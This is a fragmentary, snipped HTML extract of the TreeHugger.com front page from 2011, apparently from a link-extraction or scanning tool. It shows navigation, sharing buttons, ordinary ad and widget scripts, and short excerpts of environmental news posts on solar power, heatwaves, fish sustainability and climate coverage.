<a href="http://twitter.com/treehugger" class="twitter-follow-button" data-button="grey" data-text-color="#FFFFFF" data-link-color="#74b31f" data-show-count="false" data-width="150px" data-align="right">Follow @treehugger</a>
<script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...
</a> | <a href="http://planetgreen.discovery.com/videos/treehugger-tv/">TV</a>
...[SNIP]...
</a> | <a href="http://store.discovery.com/detail.php?p=85651&ecid=PRF-TV1-100594&pa=PRF-TV1-100594">TreeHugger Book</a>
...[SNIP]...
<TD><a href="http://planetgreen.discovery.com/games-quizzes/tom-green-quiz-game.html?campaign=th_nav_quiz" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image14','','http://www.treehugger.com/images_site/nav-images/nav-over_14.png',1)"><img src="http://www.treehugger.com/images_site/nav-images/nav_14.png" alt="Planet Green Games" name="Image14" width="163" height="15" border="0">
...[SNIP]...
<TD><a href="http://planetgreen.discovery.com/games-quizzes/?campaign=th_nav_quiz" onMouseOut="MM_swapImgRestore()" onMouseOver="MM_swapImage('Image17','','http://www.treehugger.com/images_site/nav-images/nav-over_17.png',1)"><img src="http://www.treehugger.com/images_site/nav-images/nav_17.png" alt="Pop quizzes" name="Image17" width="163" height="19" border="0">
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<strong><a title="http://www.projectgreenbag.com" href="http://www.projectgreenbag.com" rel="nofollow">Manuel</a>
...[SNIP]...
<strong><a title="http://www.youtube.com/user/odziz" href="http://www.youtube.com/user/odziz" rel="nofollow">Barry</a>
...[SNIP]...
<strong><a title="http://www.nonscalable.com" href="http://www.nonscalable.com" rel="nofollow">Derek</a>
...[SNIP]...
</h3>
<a href="http://feedproxy.google.com/TreehuggerRadio" rel="nofollow"><img style="padding-left: 8px;" border="0" src="http://www.treehugger.com/images_site/rss-podcast.gif">
...[SNIP]...
</h3>
<a href="http://feeds.feedburner.com/treehugger/itunes" rel="nofollow"><img style="padding-left: 8px;" border="0" src="http://www.treehugger.com/images_site/video-podcast.gif">
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1;"><a href="http://digg.com/submit?url=http://www.treehugger.com/files/2011/07/mass-extinctions-easier-to-trigger.php&title=Mass Extinctions: Now Easier Than Ever to Trigger!"><img src="http://www.treehugger.com/images/social-media/small/16x16-digg-guy.png" />
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1;"><a href="http://www.reddit.com/submit?url=http://www.treehugger.com/files/2011/07/mass-extinctions-easier-to-trigger.php&title=Mass Extinctions: Now Easier Than Ever to Trigger!"><img src="http://www.treehugger.com/images/social-media/small/reddit.png" />
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1; padding-left: 0px;"> <a href="http://www.facebook.com/share.php?u=http://www.treehugger.com/files/2011/07/mass-extinctions-easier-to-trigger.php&t=Mass Extinctions: Now Easier Than Ever to Trigger!" style="text-decoration:none;"><img src="http://www.treehugger.com/images/social-media/small/facebook-share.png" border="0" />
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1; padding-left: 0px;"><a href="http://www.stumbleupon.com/submit?url=http://www.treehugger.com/files/2011/07/mass-extinctions-easier-to-trigger.php&title=Mass Extinctions: Now Easier Than Ever to Trigger!"><img src="http://www.treehugger.com/images/social-media/small/stumbleupon.png" />
...[SNIP]...
<em>Image credit: <a href="http://www.flickr.com/photos/ajc1/5764344969/">AJC1 via Flickr/CC BY</a>
...[SNIP]...
<div class="entry-footer">
<iframe src="http://www.facebook.com/plugins/comments.php?href=http://www.treehugger.com/files/2011/07/mass-extinctions-easier-to-trigger.php&permalink=1" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:130px; height:16px;" allowTransparency="true"></iframe>
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1;"><a href="http://digg.com/submit?url=http://www.treehugger.com/files/2011/07/worlds-largest-solar-farm-usa.php&title=Worlds Largest (400MW) Solar PV Farm Planned for Somewhere in USA"><img src="http://www.treehugger.com/images/social-media/small/16x16-digg-guy.png" />
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1;"><a href="http://www.reddit.com/submit?url=http://www.treehugger.com/files/2011/07/worlds-largest-solar-farm-usa.php&title=Worlds Largest (400MW) Solar PV Farm Planned for Somewhere in USA"><img src="http://www.treehugger.com/images/social-media/small/reddit.png" />
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1; padding-left: 0px;"> <a href="http://www.facebook.com/share.php?u=http://www.treehugger.com/files/2011/07/worlds-largest-solar-farm-usa.php&t=Worlds Largest (400MW) Solar PV Farm Planned for Somewhere in USA" style="text-decoration:none;"><img src="http://www.treehugger.com/images/social-media/small/facebook-share.png" border="0" />
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1; padding-left: 0px;"><a href="http://www.stumbleupon.com/submit?url=http://www.treehugger.com/files/2011/07/worlds-largest-solar-farm-usa.php&title=Worlds Largest (400MW) Solar PV Farm Planned for Somewhere in USA"><img src="http://www.treehugger.com/images/social-media/small/stumbleupon.png" />
...[SNIP]...
<em>Image credit: <a href="http://www.natlsolar.com/">NSP</a>
...[SNIP]...
<div class="entry-footer">
<iframe src="http://www.facebook.com/plugins/comments.php?href=http://www.treehugger.com/files/2011/07/worlds-largest-solar-farm-usa.php&permalink=1" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:130px; height:16px;" allowTransparency="true"></iframe>
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1;"><a href="http://digg.com/submit?url=http://www.treehugger.com/files/2011/07/whichfish-org-lists-fish-that-are-safe-to-eat-sustainable.php&title=WhichFish.org Lists Fish that are Safe to Eat"><img src="http://www.treehugger.com/images/social-media/small/16x16-digg-guy.png" />
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1;"><a href="http://www.reddit.com/submit?url=http://www.treehugger.com/files/2011/07/whichfish-org-lists-fish-that-are-safe-to-eat-sustainable.php&title=WhichFish.org Lists Fish that are Safe to Eat"><img src="http://www.treehugger.com/images/social-media/small/reddit.png" />
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1; padding-left: 0px;"> <a href="http://www.facebook.com/share.php?u=http://www.treehugger.com/files/2011/07/whichfish-org-lists-fish-that-are-safe-to-eat-sustainable.php&t=WhichFish.org Lists Fish that are Safe to Eat" style="text-decoration:none;"><img src="http://www.treehugger.com/images/social-media/small/facebook-share.png" border="0" />
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1; padding-left: 0px;"><a href="http://www.stumbleupon.com/submit?url=http://www.treehugger.com/files/2011/07/whichfish-org-lists-fish-that-are-safe-to-eat-sustainable.php&title=WhichFish.org Lists Fish that are Safe to Eat"><img src="http://www.treehugger.com/images/social-media/small/stumbleupon.png" />
...[SNIP]...
<br />
There are many good ways to figure out which species of fish are under pressure - or even facing extinction - and which are 'ok' to eat. The most popular is probably the <a href="http://www.montereybayaquarium.org/">Monterey Bay Aquarium</a>'s <a href="http://www.montereybayaquarium.org/cr/SeafoodWatch/web/sfw_iPhone.aspx">Seafood Watch app for iPhone and Android</a>. The <a href="http://www.mcsuk.org/">Marine Conservation Society</a> also has a site called <a href="http://www.fishonline.org/">FishOnline</a>, as does <a href="http://www.greenpeace.org/usa/en/campaigns/oceans/seafood/red-fish/">Greenpeace</a>
...[SNIP]...
<div class="entry-footer">
<iframe src="http://www.facebook.com/plugins/comments.php?href=http://www.treehugger.com/files/2011/07/whichfish-org-lists-fish-that-are-safe-to-eat-sustainable.php&permalink=1" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:130px; height:16px;" allowTransparency="true"></iframe>
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1;"><a href="http://digg.com/submit?url=http://www.treehugger.com/files/2011/07/another-reason-we-need-the-smart-grid-record-heat.php&title=Another Reason We Need the Smart Grid: Record Heat"><img src="http://www.treehugger.com/images/social-media/small/16x16-digg-guy.png" />
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1;"><a href="http://www.reddit.com/submit?url=http://www.treehugger.com/files/2011/07/another-reason-we-need-the-smart-grid-record-heat.php&title=Another Reason We Need the Smart Grid: Record Heat"><img src="http://www.treehugger.com/images/social-media/small/reddit.png" />
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1; padding-left: 0px;"> <a href="http://www.facebook.com/share.php?u=http://www.treehugger.com/files/2011/07/another-reason-we-need-the-smart-grid-record-heat.php&t=Another Reason We Need the Smart Grid: Record Heat" style="text-decoration:none;"><img src="http://www.treehugger.com/images/social-media/small/facebook-share.png" border="0" />
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1; padding-left: 0px;"><a href="http://www.stumbleupon.com/submit?url=http://www.treehugger.com/files/2011/07/another-reason-we-need-the-smart-grid-record-heat.php&title=Another Reason We Need the Smart Grid: Record Heat"><img src="http://www.treehugger.com/images/social-media/small/stumbleupon.png" />
...[SNIP]...
<p>In case you're still among the set doubting if the smart grid is really necessary, <a href="http://gigaom.com/cleantech/another-reason-we-need-the-smart-grid-record-heat/">Earth2Tech </a>
...[SNIP]...
<p>Read the full piece on <a href="http://gigaom.com/cleantech/another-reason-we-need-the-smart-grid-record-heat/">Earth2Tech.</a>
...[SNIP]...
<div class="entry-footer">
<iframe src="http://www.facebook.com/plugins/comments.php?href=http://www.treehugger.com/files/2011/07/another-reason-we-need-the-smart-grid-record-heat.php&permalink=1" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:130px; height:16px;" allowTransparency="true"></iframe>
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1;"><a href="http://digg.com/submit?url=http://www.treehugger.com/files/2011/07/italy-now-second-place-world-solar-pv.php&title=Italy Now in Second Place in World Solar PV Rankings"><img src="http://www.treehugger.com/images/social-media/small/16x16-digg-guy.png" />
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1;"><a href="http://www.reddit.com/submit?url=http://www.treehugger.com/files/2011/07/italy-now-second-place-world-solar-pv.php&title=Italy Now in Second Place in World Solar PV Rankings"><img src="http://www.treehugger.com/images/social-media/small/reddit.png" />
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1; padding-left: 0px;"> <a href="http://www.facebook.com/share.php?u=http://www.treehugger.com/files/2011/07/italy-now-second-place-world-solar-pv.php&t=Italy Now in Second Place in World Solar PV Rankings" style="text-decoration:none;"><img src="http://www.treehugger.com/images/social-media/small/facebook-share.png" border="0" />
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1; padding-left: 0px;"><a href="http://www.stumbleupon.com/submit?url=http://www.treehugger.com/files/2011/07/italy-now-second-place-world-solar-pv.php&title=Italy Now in Second Place in World Solar PV Rankings"><img src="http://www.treehugger.com/images/social-media/small/stumbleupon.png" />
...[SNIP]...
<p>Italy continues to shake things up in solar power. New stats from <a href="http://atlasole.gse.it/atlasole/">Gestore dei Servizi Energetici</a> being highlighting by <a href="http://www.wind-works.org/FeedLaws/Italy/ItalyPasses7000MWofTotalInstalledSolarPV.html">Wind-Works.org</a>
...[SNIP]...
<div class="entry-footer">
<iframe src="http://www.facebook.com/plugins/comments.php?href=http://www.treehugger.com/files/2011/07/italy-now-second-place-world-solar-pv.php&permalink=1" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:130px; height:16px;" allowTransparency="true"></iframe>
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1;"><a href="http://digg.com/submit?url=http://www.treehugger.com/files/2011/07/how-latest-heatwave-isnt-like-ones-weve-had-in-past.php&title=How This Latest Heatwave Isnt Like Ones Weve Had In The Past: Context & Nature"><img src="http://www.treehugger.com/images/social-media/small/16x16-digg-guy.png" />
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1;"><a href="http://www.reddit.com/submit?url=http://www.treehugger.com/files/2011/07/how-latest-heatwave-isnt-like-ones-weve-had-in-past.php&title=How This Latest Heatwave Isnt Like Ones Weve Had In The Past: Context & Nature"><img src="http://www.treehugger.com/images/social-media/small/reddit.png" />
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1; padding-left: 0px;"> <a href="http://www.facebook.com/share.php?u=http://www.treehugger.com/files/2011/07/how-latest-heatwave-isnt-like-ones-weve-had-in-past.php&t=How This Latest Heatwave Isnt Like Ones Weve Had In The Past: Context & Nature" style="text-decoration:none;"><img src="http://www.treehugger.com/images/social-media/small/facebook-share.png" border="0" />
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1; padding-left: 0px;"><a href="http://www.stumbleupon.com/submit?url=http://www.treehugger.com/files/2011/07/how-latest-heatwave-isnt-like-ones-weve-had-in-past.php&title=How This Latest Heatwave Isnt Like Ones Weve Had In The Past: Context & Nature"><img src="http://www.treehugger.com/images/social-media/small/stumbleupon.png" />
...[SNIP]...
<small>photo: <a href="http://www.flickr.com/photos/capnkiddd/3770942054/sizes/m/in/photostream/">Dennis Jernberg</a>/<a href="http://creativecommons.org/licenses/by/2.0/">Creative Commons</a>
...[SNIP]...
and there is indeed a component of natural variability at play. But that's far from the whole story. If you're wondering what makes the latest heatwave different from those that have occurred before, <a href="http://www.weather.com/blog/weather/8_25097.html">Weather.com</a> has a pretty good summary (h/t <a href="http://thinkprogress.org/romm/2011/07/21/275893/500-days-of-summer-were-heat-wave/">Climate Progress</a>
...[SNIP]...
<div class="entry-footer">
<iframe src="http://www.facebook.com/plugins/comments.php?href=http://www.treehugger.com/files/2011/07/how-latest-heatwave-isnt-like-ones-weve-had-in-past.php&permalink=1" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:130px; height:16px;" allowTransparency="true"></iframe>
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1;"><a href="http://digg.com/submit?url=http://www.treehugger.com/files/2011/07/mountaintop-removal-solar-power.php&title=Could Mountaintop Removal Sites Power Kentucky With Solar?"><img src="http://www.treehugger.com/images/social-media/small/16x16-digg-guy.png" />
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1;"><a href="http://www.reddit.com/submit?url=http://www.treehugger.com/files/2011/07/mountaintop-removal-solar-power.php&title=Could Mountaintop Removal Sites Power Kentucky With Solar?"><img src="http://www.treehugger.com/images/social-media/small/reddit.png" />
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1; padding-left: 0px;"> <a href="http://www.facebook.com/share.php?u=http://www.treehugger.com/files/2011/07/mountaintop-removal-solar-power.php&t=Could Mountaintop Removal Sites Power Kentucky With Solar?" style="text-decoration:none;"><img src="http://www.treehugger.com/images/social-media/small/facebook-share.png" border="0" />
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1; padding-left: 0px;"><a href="http://www.stumbleupon.com/submit?url=http://www.treehugger.com/files/2011/07/mountaintop-removal-solar-power.php&title=Could Mountaintop Removal Sites Power Kentucky With Solar?"><img src="http://www.treehugger.com/images/social-media/small/stumbleupon.png" />
...[SNIP]...
ts of extractive industries of the past into gleaming beacons of a more positive future. That's why an admittedly speculative essay over at Renewable Energy World caught my eye, in which Dan Hofman of <a href="http://www.regenensolar.com/RegenEn_Solar.html">RegenEn Solar</a> suggests that <a href="http://www.renewableenergyworld.com/rea/news/article/2011/07/putting-damaged-land-to-good-use">the whole of Kentucky could be powered by solar farms on former mountaintop removal sites</a>
...[SNIP]...
<div class="entry-footer">
<iframe src="http://www.facebook.com/plugins/comments.php?href=http://www.treehugger.com/files/2011/07/mountaintop-removal-solar-power.php&permalink=1" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:130px; height:16px;" allowTransparency="true"></iframe>
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1;"><a href="http://digg.com/submit?url=http://www.treehugger.com/files/2011/07/bbc-skeptics-too-much-air-time.php&title=The BBC Gives Climate Skeptics Too Much Air Time, Says Inquiry"><img src="http://www.treehugger.com/images/social-media/small/16x16-digg-guy.png" />
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1;"><a href="http://www.reddit.com/submit?url=http://www.treehugger.com/files/2011/07/bbc-skeptics-too-much-air-time.php&title=The BBC Gives Climate Skeptics Too Much Air Time, Says Inquiry"><img src="http://www.treehugger.com/images/social-media/small/reddit.png" />
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1; padding-left: 0px;"> <a href="http://www.facebook.com/share.php?u=http://www.treehugger.com/files/2011/07/bbc-skeptics-too-much-air-time.php&t=The BBC Gives Climate Skeptics Too Much Air Time, Says Inquiry" style="text-decoration:none;"><img src="http://www.treehugger.com/images/social-media/small/facebook-share.png" border="0" />
...[SNIP]...
<td style="border-right: 1px dotted #d1d1d1; padding-left: 0px;"><a href="http://www.stumbleupon.com/submit?url=http://www.treehugger.com/files/2011/07/bbc-skeptics-too-much-air-time.php&title=The BBC Gives Climate Skeptics Too Much Air Time, Says Inquiry"><img src="http://www.treehugger.com/images/social-media/small/stumbleupon.png" />
...[SNIP]...
<em>Image credit: <a href="http://www.flickr.com/photos/katie_hannan/4127359747/">katykat</a>, used under <a href="http://creativecommons.org/licenses/by-nd/2.0/deed.en">Creative Commons</a>
...[SNIP]...
he BBC has fallen into that trap, as The Independent reports that an independent inquiry has found the broadcasting corporation has been presenting a distorted picture of current scientific opinion by <a href="http://www.independent.co.uk/environment/climate-change/climate-sceptics-get-too-much-airtime-bbc-told-2317718.html">giving climate skeptics too much air-time</a>
...[SNIP]...
<div class="entry-footer">
<iframe src="http://www.facebook.com/plugins/comments.php?href=http://www.treehugger.com/files/2011/07/bbc-skeptics-too-much-air-time.php&permalink=1" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:130px; height:16px;" allowTransparency="true"></iframe>
...[SNIP]...
<small>Photo: <a href="http://www.flickr.com/photos/diametrik/354983385/sizes/l/in/photostream/">diametrik / cc</a>
...[SNIP]...
<div class="related-indiv-body">

<iframe src="http://player.vimeo.com/video/8022406?title=0&byline=0&portrait=0" width="468" height="351" frameborder="0"></iframe><p><a href="http://vimeo.com/8022406">The Ballad of Marshall Mcluhan</a> from <a href="http://vimeo.com/user2716120">Randall Acronym</a> on <a href="http://vimeo.com">Vimeo</a>.</p>

It is the Marshall McLuhan's 100th birthday today. In the video above, the very funny <a href="http://www.thevestibules.com/">Vestibules</a> describes the Marshall as having "the best insight into mass media, this side of the Rio Grande."

The<a href="http://en.wikipedia.org/wiki/Marshall_McLuhan"> great media theorist</a>
...[SNIP]...
<small>Photo: <a href="http://www.flickr.com/photos/walmartcorporate/5258813438/sizes/l/in/photostream/">Flickr</a>
...[SNIP]...
at there's something like 20% unemployment in the construction sector and that even non-skilled people can learned to do this, it would certainly make sense and pay for itself with energy savings. Via <a href="http://www.theatlantic.com/business/archive/2011/07/paint-your-roofs-white/241784/">The Atlantic</a>
...[SNIP]...
when something 'material' happens, something important enough to effect the fortunes of the company, the shareholders must be informed in a publicly-available filing with the SEC. well, if you look at <a href="http://www.google.ca//finance?chdnp=0&chdd=1&chds=1&chdv=1&chvs=Linear&chdeh=0&chfdeh=0&chdet=1311192000000&chddm=391&chls=IntervalBasedLine&q=NASDAQ:TSLA&ntsp=0">this chart</a>
...[SNIP]...
rature records are being broken left and right. (And people still manage to somehow disavow climate change's role) But it's important to pay attention to the kinds of records that are being broken, as <a href="http://www.grist.org/list/2011-07-21-nyc-mayor-bloomberg-gives-50-million-to-fight-coal-michael-bloom">Grist's Christopher Mims points out</a>
...[SNIP]...
ong. The most common - and green - solution to that problem is to get second-hand clothes from family, friends, or classified ads. But thanks to our increasingly online world, you can add to that list <a href="http://plumgear.com/">Plum</a>
...[SNIP]...
<em>A spherical robot equipped with a camera may navigate underground pipes of a nuclear reactor by propelling itself with an internal network of valves and pumps. Image:<a href="http://web.mit.edu/press/media.html?id=14775"> Harry Asada/d'Arbeloff Laboratory
</a></em>

According to a recent study released in June, about <a href="http://www.msnbc.msn.com/id/43455859/ns/us_news-environment/t/safety-rules-loosened-aging-nuclear-reactors/">75% of the US's nuclear reactors have sprung a leak</a>
...[SNIP]...
</em>

MIT's <a href="http://senseable.mit.edu/backtalk/">SENSEable City Lab </a>
...[SNIP]...
<em>Photo by <a href="http://www.flickr.com/photos/soggydan/4365687955/sizes/m/in/photostream/">soggydan</a>
...[SNIP]...
<div class="related-indiv-body">

<iframe src="http://player.vimeo.com/video/25752549?title=0&byline=0&portrait=0" width="400" height="300" frameborder="0"></iframe><p><a href="http://vimeo.com/25752549">BIKE GUIDE</a> from <a href="http://vimeo.com/user7615424">Kukil Han</a> on <a href="http://vimeo.com">Vimeo</a>.</p>

A designer named Kukil Han from Seoul has posted his well thought-out innovation for a linked vehicle system he calls <a href="http://www.coroflot.com/hankukilbo/BIKE-GUIDE">Bike Guide</a> that would allow people to travel to tourists destinations around the South Korean capital in an eco-friendly manner. Han's <a href="http://www.earthtechling.com/tag/concepts/">concept</a>
...[SNIP]...
<em>Photo by<a href="http://www.flickr.com/photos/imaginecup/5935442924/"> ImagineCup </a>
...[SNIP]...
<em>Photo by<a href="http://www.flickr.com/photos/oxfameastafrica/5758400938/sizes/m/in/photostream/"> Oxfam East Africa</a>
...[SNIP]...
</a> in the not too distant future. But we are already seeing signs that falling prices are leading to increased uptake. Renewable Energy World, for example, reports that when <a href="http://www.cpsenergy.com/">CPS Energy</a>, the municipal utility for San Antonio, Texas, <a href="http://www.renewableenergyworld.com/rea/news/article/2011/07/50-mw-of-solar-make-that-400">invited bids for a 50MW solar plant</a>
...[SNIP]...
<em>Photo by <a href="http://www.flickr.com/photos/markchapmanphoto/4808973092/sizes/m/in/photostream/">Mark Chapman photo</a>
...[SNIP]...
<div class="related-indiv-body">

<iframe width="468" height="296" src="http://www.youtube.com/embed/6hCRafyV0zI?rel=0" frameborder="0" allowfullscreen></iframe>
...[SNIP]...
</a> to the day. Over at Dot Earth, <a href="http://dotearth.blogs.nytimes.com/2011/07/19/steve-schneiders-climate-view/">Andy Revkin celebrates his life's work</a>
...[SNIP]...
<em>All photos by Mike Schropp of <a href="http://www.totalgeekdom.com/?p=572">Total Geekdom</a>
...[SNIP]...
<small>photo: <a href="http://www.flickr.com/photos/gsfc/5937599688/sizes/m/in/photostream/">NASA Goddard Photo and Video</a>/<a href="http://creativecommons.org/licenses/by/2.0/">Creative Commons</a>
...[SNIP]...
</em>

New images from the <a href="http://nsidc.org/arcticseaicenews/2011/071811.html">National Snow and Ice Data Center</a>
...[SNIP]...
<em>Photo by <a href="http://www.flickr.com/photos/wonderlane/2316410772/sizes/m/in/photostream/">Wonderlane</a>
...[SNIP]...
<small>photo: <a href="http://www.flickr.com/photos/jonezes/4207513228/sizes/m/in/photostream/">dennis and aimee jonez</a>/<a href="http://creativecommons.org/licenses/by-sa/2.0/">Creative Commons</a>
...[SNIP]...
</em>

Add another non-human species to the list of those documented to use tools: The <a href="http://en.wikipedia.org/wiki/Blackspot_tuskfish">blackspot tuskfish</a>
...[SNIP]...
</em>). As <a href="http://news.mongabay.com/2011/0717-hance_fish_tools.html">Mongabay</a> reports, photographs taken in the Great Barrier Reef and an article in the journal <a href="http://www.springer.com/life+sciences/ecology/journal/338"><em>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<li><a href="http://www.conedsolutions.com" title="Deregulation in New York now enables consumers like you to help make a difference by choosing the type of power you purchase. Not only can you choose your own electricity supplier, but you can also help maintain a healthy environment for your children and the people of New York, by choosing GREEN Power or WIND Power." rel="nofollow" target="_self">Wind Power</a>
...[SNIP]...
<li><a href="http://www.americanapparel.net/" title="American Apparel is a vertically integrated manufacturer and retailer of clothing for men, women, kids and dogs. Meaning, we've consolidated all stages of production under one roof at our downtown Los Angeles factory...from the cutting and sewing, right through to the photography and marketing. " rel="nofollow" target="_self">American Apparel</a>
...[SNIP]...
<li><a href="http://www.simpleshoes.com" title="The nice little shoe company getting in touch with its inner hippie." rel="nofollow" target="_self">Simple Shoes</a>
...[SNIP]...
<li><a href="http://www.suntechnics.com" title="What can solar do for you?" rel="nofollow" target="_self">Suntechnics</a>
...[SNIP]...
<li><a href="http://www.strategiesforsustainability.blogspot.com/" title="Georges Dyer's running journal from the Masters in Strategic Leadership Towards Sustainability program at the Blekinege Institute of Technology in Karlskrona, Sweden." rel="nofollow" target="_self">Strategies for Sustainability</a>
...[SNIP]...
<li><a href="http://www.houseandgarden.com/main/blogs/treehugger" title="Green design for the well-lived life." rel="nofollow" target="_self">House & Garden</a>
...[SNIP]...
<li><a href="http://gristmill.grist.org/" title="Continuous news and commentary on matters earth-related." rel="nofollow" target="_self">Gristmill</a></li>
<li><a href="http://www.vivavi.com" title="Vivavi offers modern style eco-friendly furniture & furnishings." rel="nofollow" target="_self">Vivavi</a></li>
<li><a href="http://www.columbia.edu/cu/mpaenvironment" title="Learn more about the Environmental MPA program. Visit, attend classes, and meet current students." rel="nofollow" target="_self">Columbia University</a>
...[SNIP]...
<li><a href="http://climate.weather.com/" title="Throughout the world, people are confused about climate change and global warming. For this reason, The Weather Channel created One Degree." rel="nofollow" target="_self">One Degree at Weather.com</a>
...[SNIP]...
<li><a href="http://askpablo.org/" title="Pablo P..ster is an Sustainability Engineering Consultant with Euroconsult. He answers readers' questions with regards to such technical issues as energy consumption, efficiency, life cycle analysis, and environmental footprints of business" rel="nofollow" target="_self">Ask Pablo</a></li>
<li><a href="http://sustainablog.org/" title="Sustainablog is dedicated to news, information and personal meanderings related to environmental and economic sustainability, green and sustainable business, and environmental politics." rel="nofollow" target="_self">Sustainablog</a>
...[SNIP]...
<li><a href="http://www.sheagunther.org" title="Shea Gunther is a hybrid entrepreneur, environmentalist, and all around big-thinker. He founded Zoom Culture in 1999 at the age of 20, Renewable Choice in 2001, Skye Creative in 2005, and is launching OffsetMyLife.com in March of 2006." rel="nofollow" target="_self">Shea Gunther</a>
...[SNIP]...
<li><a href="http://technorati.com/faves?add=http://www.treehugger.com">Favorite TreeHugger at Technorati</a>
...[SNIP]...
<li>Subscribe to our feed:

<a href="http://feeds.feedburner.com/treehuggersite"><img src="http://feeds.feedburner.com/~fc/treehuggersite?bg=00CC00&fg=444444&anim=1" height="26" width="88" style="border:0" alt="" /></a>
...[SNIP]...
<li><a href="http://www.greendrinks.org" title="Every month people who work in the environmental field meet up for a beer at informal sessions known as Green Drinks." rel="nofollow" target="_self">GreenDrinks</a>
...[SNIP]...
<li><a href="http://ourtomorrow.blogspot.com/" title="Another world is possible." rel="nofollow" target="_self">Our Tomorrow</a>
...[SNIP]...
<li><a href="http://itstheenvironmentstupid.blogspot.com/" title="The world needs to wake up and realize that the environment is just as important as the economy, and the health of both are crucial to social-well being. This blog explores these connections." rel="nofollow" target="_self">It's the Environment, Stupid.</a>
...[SNIP]...
<li><a href="http://www.idealbite.com/blog" title="Irreverent thoughts on being green." rel="nofollow" target="_self">Ideal Bite</a>
...[SNIP]...
<li><a href="http://eco.psfk.com" title="PSFK.com is a lens of changes in cultural behavior that influence all of us. In a world with unparalleled access to endless content, it's hard to know where to begin your search for insightful information. Beyond the algorithm of the search engine, the human touch makes a difference." rel="nofollow" target="_self">Eco.PSFK</a></li>
<li><a href="http://www.howtosavetheworldforfree.com/" title="Green musings from Great Britain." rel="nofollow" target="_self">How to Save the World for Free</a>
...[SNIP]...
<li><a href="http://www.green-links.org" title="Green-Links is a community driven online resource for all things 'green' in New York City. From environmental events and jobs to articles, profiles, and more...Green-Links is the place to find out what's green and happening in the Big Apple. " rel="nofollow" target="_self">Green-Links</a>
...[SNIP]...
<li><a href="http://www.design-niche.com" title="NICHE is a modern design firm focused on creating beautiful contemporary interiors and furniture with an emphasis on sustainability." rel="nofollow" target="_self">DesignNiche</a>
...[SNIP]...
<li><a href="http://www.lime.com/planet" title="The latest news and how-to videos on renewable resources, recyclable products and recycling, alternative energy, eco-friendly and carbon-neutral living, climate change and global warming, greenhouse gasses, nature and wildlife conservation, sustainable goods, ozone depletion, and ideas for keeping your home and wardrobe eco-smart." rel="nofollow" target="_self">Lime</a></li>
<li><a href="http://timesonline.typepad.com/eco_worrier/" title="Anna Shepard writes the Eco-Worrier column in the Body & Soul, a magazine of The Times (UK) newspaper." rel="nofollow" target="_self">EcoWorrier</a>
...[SNIP]...
<li><a href="http://lumag.com" title="L.. is a green fashion magazine in the making. It means green in Chinese. What China does in the next few years will decide the fate of the earth." rel="nofollow" target="_self">L..</a></li>
<li><a href="http://promote.pair.com/direct.pl?treehugger" title="World class web hosting." rel="nofollow" target="_self">Pair WebHosting</a>
...[SNIP]...
<li><a href="http://www.plentymag.com/" title="The leading magazine for green living, offering a hip, irreverent look at today's environmental issues." rel="nofollow" target="_self">Plenty Magazine</a>
...[SNIP]...
<div class="single-house-ad">
<a href="http://www.pair.com/"><img src="http://www.treehugger.com/images/ads/house-ads/pair/pair_button4_125x125.jpg" border="0" />
...[SNIP]...
<div class="nav-top-sub2">
© TreeHugger.com 2011 |
<a href="http://corporate.discovery.com/visitor-agreement/">Visitor Agreement</a> |
<a href="http://corporate.discovery.com/privacy-policy/">Privacy Policy</a> | <a href="http://corporate.discovery.com">Discovery Communications, LLC</a>
...[SNIP]...
</strong> <a href="http://dsc.discovery.com">Discovery Channel</a> | <a href="http://tlc.discovery.com">TLC</a> | <a href="http://animal.discovery.com">Animal Planet</a> | <a href="http://health.discovery.com">Discovery Health</a> | <a href="http://science.discovery.com">Science Channel</a> | <a href="http://store.discovery.com/?ecid=PRF-TV1-100552&pa=PRF-TV1-100552">Discovery Store</a>
...[SNIP]...
